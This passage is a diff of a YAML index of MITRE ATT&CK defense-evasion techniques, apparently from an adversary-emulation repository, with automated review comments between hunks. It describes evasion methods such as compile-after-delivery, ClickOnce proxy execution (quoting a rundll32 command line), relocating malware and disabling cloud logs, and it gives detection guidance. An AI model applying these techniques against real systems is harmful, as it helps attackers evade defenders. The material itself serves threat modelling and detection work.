T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
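Review bot: the updated T1027.004 description now names `ilasm.exe` (with the new `ATTACK IQ` citation) as a compile-after-delivery utility, but the `x_mitre_detection` text in the same object still tells analysts to monitor only `csc.exe and GCC/MinGW`. This is upstream ATT&CK content rather than something to hand-edit in the index, but anyone writing an atomic test or a detection rule from this entry should treat `ilasm.exe` as in scope, so it is worth a line in the PR description. The citation is also glued to the binary name with no separating space (`ilasm.exe(Citation: ATTACK IQ), csc.exe`), which matches the source bundle but will render oddly wherever the description is displayed.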
@@ -11040,9 +11150,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -11054,12 +11169,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests: []
T1564.007:
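Review bot: `x_mitre_permissions_required: [User]` disappears from T1027.004 here, and the same field is dropped from T1578.002 later in the diff, with nothing replacing it; if the test runner or any index column surfaces required permissions, those consumers will now find the key absent rather than a value. Either confirm nothing reads it or document that the field is retired alongside `spec_version`. The reference list in the same hunk is also reordered and re-keyed (`description` now precedes `url`, `ClearSky` moves ahead of `TrendMicro`), which is harmless but turns a one-citation addition into a forty-line diff; emitting references in a fixed order would keep future ATT&CK updates reviewable.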
@@ -11107,7 +11245,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11133,12 +11271,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11228,7 +11364,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1127.001:
@@ -11286,12 +11421,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests: []
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -11333,10 +11467,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -11360,18 +11493,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
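Review bot: the new T1578.005 description ends with `Cloud Regions](https://attack.mitre.org/techniques/T1535). "`, a trailing space inside the closing quote that looks like a leftover from the paragraph deleted after it; strip trailing whitespace in the generator, since that stray space is most likely what pushes the emitter from the previous `|-` block style to the quoted, folded form seen here. The substance of the change is consistent: the Azure subscription-hijacking paragraph (Global Administrator creating subscriptions, transferring pay-as-you-go subscriptions to an attacker tenant) is removed, `x_mitre_version` goes from `1.0` to `2.0`, and the two references that only that paragraph cited are dropped in a later hunk, while `(Citation: Microsoft Azure Policy)` and `(Citation: Microsoft Cryptojacking 2023)` remain with their entries intact.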
@@ -11385,7 +11530,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -11397,20 +11542,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
@@ -11419,11 +11555,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11432,6 +11567,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -11441,6 +11577,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
@@ -11452,13 +11589,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
@@ -11503,9 +11640,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests:
- name: Azure - Eventhub Deletion
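Review bot: for T1562.008 the `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` keys are relocated into the middle of the object (added after `kill_chain_phases` and `x_mitre_is_subtechnique`, removed from after `object_marking_refs`), while for T1550.004, T1656 and T1578.005 in this same diff they stay at the end; the generator is evidently preserving whatever key order the upstream bundle happens to emit, so each ATT&CK release will keep producing move-only churn like this. Sorting keys, or fixing a canonical order, on output would let the real changes in this object (the `Office Suite` and `Identity Provider` platforms, the `Arun Seelagan, CISA` contributor, the `2.0` to `2.1` version bump) stand out on their own.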
@@ -11668,18 +11802,140 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests: []
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
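Review bot: the two Black Hat URLs in the new T1127.002 entry (`Burke/CISA ClickOnce Paper` and `Burke/CISA ClickOnce BlackHat`) carry `?_gl=...&_ga=...` Google Analytics parameters copied from whoever retrieved them upstream; they are not needed to fetch the PDFs and they embed a client identifier from that browsing session, so strip the query strings before committing even though they arrive verbatim from the source bundle. Separately, both new techniques (T1127.002 and T1070.010) land with `atomic_tests: []` and an empty `x_mitre_detection`, so no index CSV rows are expected for them; worth confirming that the CSV side of this change adds none.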
@@ -11712,10 +11968,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
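Review bot: for T1556.009 the platform list loses `SaaS` as well as `Azure AD`, and only `Identity Provider` is added; unlike the other platform edits in this diff, which are one-for-one renames, this one narrows the technique (Okta and JumpCloud, both named in the description, presumably now fall under `Identity Provider` rather than `SaaS`), so a SaaS-keyed index will drop this technique entirely. Flag it in the changelog so the missing row is not read as data loss.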
@@ -11752,40 +12007,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11794,20 +12019,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
